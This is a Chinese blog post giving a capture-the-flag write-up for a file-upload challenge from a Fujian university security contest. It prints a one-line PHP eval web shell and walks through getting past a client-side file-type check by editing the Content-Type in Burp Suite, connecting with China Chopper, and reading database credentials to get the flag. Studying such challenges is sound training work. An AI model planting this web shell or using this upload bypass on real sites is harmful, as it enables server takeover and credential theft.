技术博客
首页 所有文章 标签 分类 关于
技术博客

目录

第三届百越杯福建省高校网络空间安全大赛Do-you-know-uploadWriteup

 收录于 Ctf
   约 276 字   预计阅读 1 分钟 
https://bing.ee123.net/img/rand?artid=80031938

第三届“百越杯”福建省高校网络空间安全大赛Do you know upload?Writeup

推一波我的博客

第三届“百越杯”福建省高校网络空间安全大赛Do you know upload?Writeup

首先,直接上传一句话木马1.php文件

<?php eval($_POST['cmd']);?>  //文件内容

发现如图弹窗

https://i-blog.csdnimg.cn/blog_migrate/a26a514a80ce54f09b690d0fa3317080.jpeg

初步判断是前台直接判断文件类型,这种绕过相对简单,更改传输时文件类型即可

再次上传1.php的一句话,利用burpsuite抓包,将文件类型改为image/gif

https://i-blog.csdnimg.cn/blog_migrate/e3c021c9571a766a88af3c631393772f.jpeg

成功上传

https://i-blog.csdnimg.cn/blog_migrate/d9c5067e030d7e08b09c7c6ecae3f3cc.jpeg

利用菜刀连接之前的上传好的一句话,拿到shell,看到根目录中存在文件config.php,打开,看到数据库用户名和密码

https://i-blog.csdnimg.cn/blog_migrate/06eef76bd080d6071ba00e05dd7778a2.jpeg

菜刀连接数据库,拿到flag

https://i-blog.csdnimg.cn/blog_migrate/75b5ab743e3c03956d3452d4c0643625.jpeg

https://i-blog.csdnimg.cn/blog_migrate/9d55dca85615345ac61b3dcabb1de7d4.jpeg

更新于 2020-11-18
 WriteupCtf
返回 | 主页